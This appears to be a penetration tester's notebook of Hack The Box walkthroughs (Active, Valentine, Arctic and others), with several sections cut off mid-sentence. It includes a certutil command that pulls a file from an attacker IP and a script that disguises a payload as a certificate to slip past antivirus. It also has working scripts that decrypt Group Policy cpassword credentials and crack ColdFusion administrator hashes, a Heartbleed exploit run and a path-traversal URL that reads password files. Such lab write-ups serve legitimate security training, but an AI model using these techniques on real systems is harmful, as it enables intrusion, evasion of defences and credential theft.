Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command downloads «file» to the Windows machine from «http://<ip>»:

certutil.exe -urlcache -split -f http://<ip>/file file

Depending on the file, it could be detected as malicious and then be blocked. A possible solution is the method described in this post from https://www.bleepingcomputer.com. The trick is based on base64-encoding the file when sending the
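As an added example (my own code, not from the post or from the bleepingcomputer article), the bash functions below reproduce on the Kali side the PEM-style layout that certutil -encode writes and certutil -decode reads back, so the payload can be checked locally before it is served. The host name <ip>, the file names payload.txt/payload.exe and the sample bytes are assumptions; the Windows-side certutil commands appear only as comments and are not run here.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): build the text file that travels
# over HTTP in place of the binary, and verify it decodes back byte for byte.
# Assumed target-side commands (Windows cmd, not run here):
#   certutil.exe -urlcache -split -f http://<ip>/payload.txt payload.txt
#   certutil.exe -decode payload.txt payload.exe

# certutil_encode <binary> <out.txt>: BEGIN/END CERTIFICATE wrapper around
# 64-column base64 with CRLF line endings, the layout 'certutil -encode' writes
# and 'certutil -decode' accepts.
certutil_encode() {
  local cr
  cr=$(printf '\r')
  {
    printf -- '-----BEGIN CERTIFICATE-----\r\n'
    openssl base64 -in "$1" | sed "s/\$/$cr/"
    printf -- '-----END CERTIFICATE-----\r\n'
  } > "$2"
}

# certutil_decode <in.txt>: strip the wrapper lines and CRs, base64-decode to stdout.
certutil_decode() {
  local cr
  cr=$(printf '\r')
  sed -e '/^-----/d' -e "s/$cr\$//" "$1" | openssl base64 -d
}

# certutil_roundtrip_ok <binary>: returns 0 when encode followed by decode
# reproduces the input exactly (run this before serving the file).
certutil_roundtrip_ok() {
  local tmp rc
  tmp=$(mktemp -d)
  certutil_encode "$1" "$tmp/payload.txt"
  certutil_decode "$tmp/payload.txt" > "$tmp/payload.bin"
  if cmp -s "$1" "$tmp/payload.bin"; then rc=0; else rc=1; fi
  rm -rf "$tmp"
  return "$rc"
}

# make_sample_payload: constructed stand-in for a binary (a few PE-looking bytes
# followed by text), written to a temp file whose path is printed.
make_sample_payload() {
  local f
  f=$(mktemp)
  printf 'MZ\220\000\003\000\000\000constructed sample payload\n' > "$f"
  printf '%s' "$f"
}

if [ "${BASH_SOURCE[0]}" = "$0" ]; then
  sample=$(make_sample_payload)
  out=$(mktemp)
  certutil_encode "$sample" "$out"
  head -n 2 "$out"
  certutil_roundtrip_ok "$sample" && echo "round trip OK"
  rm -f "$sample" "$out"
fi
```

The wrapper is what makes the transfer look like a certificate to a casual inspection; the bytes that a signature-based scanner would match are no longer present on the wire, which is the whole point of the trick. Anything that decodes the file on the endpoint (certutil -decode, an EDR that logs certutil command lines) still sees the original binary, so treat this as a download-stage evasion only.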

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. https://github.com/Tib3rius/AutoRecon

Run the installation script:

$ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git

Add /home/ruben/.local/bin to your PATH.

Other requirements installation:

$ sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner

HTB Active

$ sudo nmap -A -T4 -p- 10.10.10.100

Let's enumerate SMB resources using SMBMap.

$ smbmap -H 10.10.10.100

$ smbclient //10.10.10.100/Replication
smb: \> dir

This share seems to be a copy of SYSVOL. According to the information found in:

Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
Attack Methods for Gaining Domain Admin Rights in Active Directory

We need to find a file such as Groups.xml, ScheduledTasks.xml or Services.xml where
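As an added example (my own code, not from the post or from the two linked articles), the bash script below does the cpassword decryption those articles describe with nothing but openssl and iconv: the AES-256 key is the one Microsoft published in MS-GPPREF (which is why any authenticated domain user can recover these passwords), the IV is sixteen zero bytes, and the base64 padding that Group Policy Preferences strips has to be restored before decoding. The Groups.xml it parses is a constructed, trimmed-down sample; the domain EXAMPLE, the account svc_backup and its password are made up.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): decrypt Group Policy Preferences
# cpassword values from a Groups.xml copied out of SYSVOL, the way gpp-decrypt does.
# Key: published by Microsoft in MS-GPPREF 2.2.1.1.4. IV: all zeros.
GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_IV=00000000000000000000000000000000

# gpp_decrypt <cpassword>: restore the '=' padding GPP strips, AES-256-CBC
# decrypt with the public key, convert the UTF-16LE plaintext to UTF-8.
gpp_decrypt() {
  local b64=$1
  while [ $(( ${#b64} % 4 )) -ne 0 ]; do b64="$b64="; done
  printf '%s' "$b64" | openssl base64 -d -A \
    | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
    | iconv -f UTF-16LE -t UTF-8
}

# gpp_encrypt <password>: the inverse, used here only to build the constructed
# sample; on an engagement the ciphertext already sits in SYSVOL.
gpp_encrypt() {
  printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE \
    | openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
    | openssl base64 -A | tr -d '='
}

# gpp_creds_from_xml <Groups.xml>: print userName:plaintext for every
# <Properties> element that carries a non-empty cpassword attribute.
gpp_creds_from_xml() {
  grep -o '<Properties [^>]*cpassword="[^"]*"[^>]*>' "$1" | while IFS= read -r props; do
    local user cpass
    user=$(printf '%s' "$props" | grep -o 'userName="[^"]*"' | cut -d'"' -f2)
    cpass=$(printf '%s' "$props" | grep -o 'cpassword="[^"]*"' | cut -d'"' -f2)
    [ -n "$cpass" ] || continue
    printf '%s:%s\n' "$user" "$(gpp_decrypt "$cpass")"
  done
}

# build_sample_groups_xml: write a constructed, trimmed-down Groups.xml
# (domain, account and password are made up) and print its path.
build_sample_groups_xml() {
  local f cpass
  f=$(mktemp)
  cpass=$(gpp_encrypt 'Summer2018!')
  printf '%s\n' \
    '<?xml version="1.0" encoding="utf-8"?>' \
    '<Groups>' \
    '  <User name="EXAMPLE\svc_backup">' \
    "    <Properties action=\"U\" cpassword=\"$cpass\" changeLogon=\"0\" noChange=\"1\" neverExpires=\"1\" acctDisabled=\"0\" userName=\"EXAMPLE\\svc_backup\"/>" \
    '  </User>' \
    '</Groups>' > "$f"
  printf '%s' "$f"
}

if [ "${BASH_SOURCE[0]}" = "$0" ]; then
  xml=$(build_sample_groups_xml)
  gpp_creds_from_xml "$xml"   # EXAMPLE\svc_backup:Summer2018!
  rm -f "$xml"
fi
```

Kali ships gpp-decrypt, which does exactly this for a single cpassword; the script is useful when you have pulled a whole Policies tree with smbclient and want every credential in one pass. Because the key is public, a cpassword in SYSVOL is equivalent to a cleartext password readable by every domain user, which is the finding to report.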

HTB Sense

$ nmap -A -T4 -p- sense.htb

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

We need to skip SSL certificate verification using the -k option.

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt

We've found 2 text documents:

changelog.txt
system-users.txt

Company defaults? As we have a pfSense site, we can try the default pfSense password (pfsense). Browse to http://10.10.10.60 This

HTB Valentine

$ sudo nmap -T4 -A -p- 10.10.10.79

$ gobuster dir -u https://10.10.10.79 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k

$ nikto -h 10.10.10.79

$ sudo nmap --script vuln -p 80 10.10.10.79
$ sudo nmap --script vuln -p 443 10.10.10.79

Based on these results, this box is vulnerable to Heartbleed. https://github.com/sensepost/heartbleed-poc

$ python heartbleed-poc.py 10.10.10.79
$ strings dump.bin

Using https://www.base64decode.org/, aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== decodes to heartbleedbelievethehype

Browse to https://10.10.10.79/dev
https://10.10.10.79/dev/notes.txt
https://10.10.10.79/dev/hype_key

This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb

We just have an Apache on port 80 and OpenSSH on port 2222. Browse to http://shocker.htb

ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e

We have a cgi-bin folder that may contain script files. Let's use Gobuster again, but this time searching for files by extension (.sh, .py).

$ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py,sh

Based on the box name

HTB Mirai

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- mirai.htb

Browse to http://mirai.htb. There is another HTTP port: browse to http://mirai.htb:32400 to be finally redirected to http://mirai.htb:32400/web/index.html. As described by the Nmap results, we have a Plex Media Server.

ruben@kali:~/htb/mirai$ gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e --wildcard

Browse to http://mirai.htb/admin/

So, do we have a Raspberry Pi, maybe running Raspbian? The default Raspbian credentials are pi:raspberry. As we have SSH open, we can try

HTB Bank

ruben@kali:~/htb/bank$ nmap -sV -T4 -p- 10.10.10.29

There is an Apache 2.4.7 on port 80 and a DNS server on port 53. If you browse to http://10.10.10.29 there is an Apache2 default site. As there is a DNS server active, it may be worth adding the hostname to /etc/hosts. HTB machines follow the same naming pattern: box_name.htb. After this step, if we browse to http://bank.htb we obtain a more promising site.

ruben@kali:~/htb/bank$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

HTB Beep

$ nmap -p- -T4 -A 10.10.10.7

$ gobuster dir -u 10.10.10.7:443 -w /usr/share/wordlists/dirb/big.txt -e -o beep.out -k

Browse to https://10.10.10.7/

So, this box contains an Elastix instance. According to the Wikipedia description: Elastix is unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialing. The Elastix 2.5 functionality is

HTB Arctic

$ sudo nmap -A -T4 -p- 10.10.10.11

8500/tcp open fmtp?

This is an odd open port. Let's check it. Browse to http://10.10.10.11:8500/ These files are part of a ColdFusion 8 installation: http://10.10.10.11:8500/CFIDE/administrator/

$ searchsploit ColdFusion
$ searchsploit -x 14641

Browse to http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

What is RDS? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administrator and ColdFusion Studio to provide remote HTTP access to files and databases. You can use RDS to manage
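As an added example (my own code, not from the post), here is what to do with the password.properties dump that the locale traversal returns: ColdFusion 8 stores the Administrator and RDS passwords as unsalted, upper-case SHA-1 hex (the encrypted=true line means hashed, not reversible), so the hashes can be extracted from the response and tested offline against a wordlist. The properties file and the wordlist below are constructed; the curl command in the comment is the assumed way to fetch the real file and is not run here.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): extract and crack the SHA-1
# hashes from a ColdFusion 8 password.properties dump.
# Assumed fetch (not run here):
#   curl -s 'http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en' > enter.html

# cf8_hash <password>: SHA-1 over the password bytes as upper-case hex, the
# form CF8 writes into password.properties.
cf8_hash() {
  printf '%s' "$1" | sha1sum | cut -c1-40 | tr 'a-f' 'A-F'
}

# cf8_hashes <file>: print the 'password=HASH' and 'rdspassword=HASH' entries,
# whether the file is the raw properties file or an HTML page that embeds it.
cf8_hashes() {
  grep -oE '\b(rdspassword|password)=[0-9A-Fa-f]{40}' "$1"
}

# cf8_crack <HASH> <wordlist>: print the first candidate whose SHA-1 matches
# (hashcat mode 100 does the same at scale); exit status 1 when nothing matches.
cf8_crack() {
  local target w
  target=$(printf '%s' "$1" | tr 'a-f' 'A-F')
  while IFS= read -r w; do
    if [ "$(cf8_hash "$w")" = "$target" ]; then
      printf '%s' "$w"
      return 0
    fi
  done < "$2"
  return 1
}

# build_sample_properties: a constructed password.properties in the CF8 layout
# (date, both passwords and the hashes derived from them are made up).
build_sample_properties() {
  local f
  f=$(mktemp)
  printf '%s\n' \
    '#Mon Jan 01 00:00:00 UTC 2018' \
    "rdspassword=$(cf8_hash 'Winter2017!')" \
    "password=$(cf8_hash 'Winter2017!')" \
    'encrypted=true' > "$f"
  printf '%s' "$f"
}

if [ "${BASH_SOURCE[0]}" = "$0" ]; then
  props=$(build_sample_properties)
  wl=$(mktemp)
  printf '%s\n' admin password 'Winter2017!' > "$wl"   # constructed wordlist
  cf8_hashes "$props"
  h=$(cf8_hashes "$props" | grep '^password=' | cut -d= -f2)
  cf8_crack "$h" "$wl" && echo
  rm -f "$props" "$wl"
fi
```

Two practical notes: the traversal response is the administrator login page with the file contents echoed into it, so run cf8_hashes on the saved HTML rather than expecting a clean properties file; and the RDS password is often the same hash as the administrator password, so one cracked value usually opens both the administrator interface and RDS.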